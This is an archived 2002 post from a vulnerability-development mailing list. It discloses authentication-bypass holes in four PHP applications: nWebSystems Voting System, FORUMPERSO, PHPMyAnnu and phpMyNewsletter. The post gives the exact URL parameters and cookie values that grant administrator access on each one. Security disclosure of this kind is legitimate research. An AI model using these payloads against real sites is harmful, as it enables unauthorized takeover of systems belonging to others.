Vulnerability Development mailing list archives
Multiples holes in PHP services.
From: "Frog Man" <leseulfrog () hotmail com>
Date: Mon, 11 Feb 2002 16:08:49 +0100
The url http://www.host.com/index.php?loggedin=true&action=auser&new_un=test&new_pw=test&new_pw1=test&new_level=1&submit=Save allow to create an admin access (nick : test, password : test) on a nWebSystems Voting System site.
More details in french : http://balteam.multimania.com/Tuts/nwebsystemsvs.txt FORUMPERSO v2.1 :Anyone can be admin if he send the cookies "pass_ok[0]","1" and "pass_ok[1]","admin" to the page http://www.host.com/connect.php3?id_forum=&addr=install.php3.
PHPMyAnnu v2.02 :Anyone can be admin if he send the cookie "phpmyannu_admin_ok","yes" to the page http://www.host.com/path/admin/admin.php3.
phpMyNewsletter v0.6.6 :Anyone can be admin if he send the cookie "adminnews","true" to the page http://www.host.com/admin.php3.
More details in french : http://balteam.multimania.com/Tuts/4cookieholes.txt frog-m@n _________________________________________________________________Téléchargez MSN Explorer gratuitement à l'adresse http://explorer.msn.fr/intl.asp.
Current thread:
- Multiples holes in PHP services. Frog Man (Feb 11)